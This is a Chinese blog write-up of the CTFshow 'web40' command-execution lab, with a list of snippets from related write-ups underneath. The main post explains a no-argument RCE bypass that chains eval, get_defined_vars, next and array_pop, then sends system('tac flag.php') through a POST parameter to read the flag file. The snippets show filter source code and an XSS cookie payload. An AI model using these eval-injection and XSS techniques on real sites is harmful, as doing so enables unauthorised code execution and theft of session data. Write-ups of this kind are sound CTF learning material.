CTFSHOW web入门——web40

最新推荐文章于 2024-10-06 15:23:32 发布
最新推荐文章于 2024-10-06 15:23:32 发布
阅读量684 收藏 3
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74093152/article/details/130343384
版权
文章讲述了如何通过过滤不完全的中文括号,结合eval函数的安全漏洞,使用get_defined_vars,array_pop,next及post参数构建payload,执行系统命令获取flag.php文件内容的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 过滤了一堆符号,但过滤的括号是中文的括号,所以还是可以正常使用英文括号的

并且这道题使用到了eval函数(返回传入字符的表达式的结果。即将字符串当成有效的表达式,进行运算、求值并返回结果。)

可以使用套娃去获得flag.php文件的内容

get_defined_vars() 返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。
array_pop() 是删除并返回数组最后一个元素
next() 返回数组中的下一个元素的值。

构造payload:?c=eval(array_pop(next(get_defined_vars())));

并post参数:b=system(''tac flag.php)

 获得flag

 

韦韦韦www
关注
[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1528
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
CTFshow 命令执行 web40
Kradress的博客
10-30 1903
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
ctfshow-web40(命令执行)
m0_62094846的博客
01-22 6262
current() prev() next() reset() end() <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer....
【CTFWP】ctfshow-web40
LongL_GuYu的博客
07-30 1449
CTFWP:ctfshow-web40
ctfshow-web入门-命令执行(web37-web40
Welcome To Myon'Blog !
06-07 2385
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
CTFshow web入门——爆破
小元砸的博客
01-24 5185
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2718
ctfshow的命令执行(web72-77)
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5896
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
ctf.show_web40(命令执行)
高高同学
03-01 782
web40无参数RCE绕过 源码 <?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highligh
CTFshow 命令执行 web37-web40
m0_74312676的博客
10-06 1314
(5)将反转后的目录使用next函数,将flag.php文件输出,值得注意的是,我们这里输出的对象是文件,前面用到的print_r函数输出的对象是参数,于是我们这里就只能用show_source或者highlight_file。我们可以看到过滤了好多的符号,最重要的是单双引号,斜杠、逗号、以及$都过滤掉了,这意味着我们之前的哪些方法都用不了了。但是值得一提的是,这里过滤掉的是中文括号,英文括号并没有被过滤掉。有多种方式来实现,最常见的是利用hacker插件,将想要传输的参数,以post的方式传输。
ctfshow-web入门(29~40
1ance's blog
06-10 824
命令执行web29web30web31web32web33web34-36web37web38 web29 题目只过滤了关键词flag,用通配符即可绕过 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 官方题解: e
CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 1230
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 553
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或和取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
CTFShow-WEB入门篇命令执行详细Wp(29-40)
Aluxian_的博客
06-10 3207
【代码】CTFShow-WEB入门篇--命令执行详细Wp。
CTFshow web入门 web28~web40 命令执行
qq_56815564的博客
04-12 737
这里可以使用的是data伪协议 data://text/plain,这个相当于执行了php语句,后面跟上的 “.php” 因为前面的php语句已经闭合了,所以后面跟上的 “.php” 会被当成html页面直接显示在页面上,起不到什么作用。很明显,flag应该就在flag.php里,但不能直接访问flag.php 因为不能直接输入字符flag,被过滤了。而filter协议和php://input如果要传的话,必须出现具体的文件名,而flag被过滤了,所以不能用。另外这里的eval($c);
ctfshow web40(命令执行)
m0_69289738的博客
09-05 133
get_defined_vars() 返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。getcwd() 函数返回当前工作目录。它可以代替pos(localeconv())localeconv():返回包含本地化数字和货币格式信息的关联数组。这里主要是返回值为数组且第一项为"."pos():输出数组第一个元素,不改变指针;current() 函数返回数组中的当前元素(单元),默认取第一个值,和pos()一样。
ctfshow-web入门——命令执行(1)(web29-web40
m0_62905745的博客
03-16 1124
本篇文章是ctfshowweb入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTF web之旅40
weixin_45501486的博客
05-10 49
ctfshow 1024杯_WEB签到 call_user_fun函数代码执行利用 第一个参数是要调用的回调函数名 第二参数是回调函数的参数 还有array_map函数 类似的函数还有call_user_fun_array 第二个参数是回调函数的参数数组 更多参考 https://www.cnblogs.com/xhds/p/12255609.html 看题目只有第一个参数可控 也就是只能传...
ctfshow web入门 xss
最新发布
02-05
### CTFShow Web XSS 入门教程与挑战题解 #### 存储型XSS实例解析 对于特定编号为web316至web333的一系列题目,这些练习主要围绕着存储型XSS展开。在这种情况下,只有当`poster`字段设置为`admin`时,提交的信息才会被服务器接受并保存下来;而一旦这样的数据得以存入数据库,则无论是通过`sender`还是`content`这两个展示区域都可能成为恶意脚本执行的入口[^1]。 ```html <!-- 示例:利用storage-based XSS --> <script> // 假设已知如何绕过身份验证并将payload作为'admin'发布 document.write('<img src=x onerror=alert(document.cookie)>'); </script> ``` #### 应对动态变化的安全机制 针对某些版本如web319, 额外增加了复杂度——管理员用户的会话令牌(即cookie中的信息)处于不断变动之中,使得传统的基于固定凭证的方法不再适用。此时可考虑借助其他功能模块来间接达成目标,比如先创建一个普通账户再尝试篡改其密码的过程中实施中间人攻击以捕获所需的数据流[^3]。 #### 利用XSS平台辅助学习 部分习题设计要求参与者能够运用专门设立的小工具或服务端口来进行交互式实验,例如获取受害者浏览器内的敏感资料(像session ID之类的认证标记),不过出于教育目的在此仅限于模拟警告框显示而非实际窃取任何真实世界里的个人信息[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值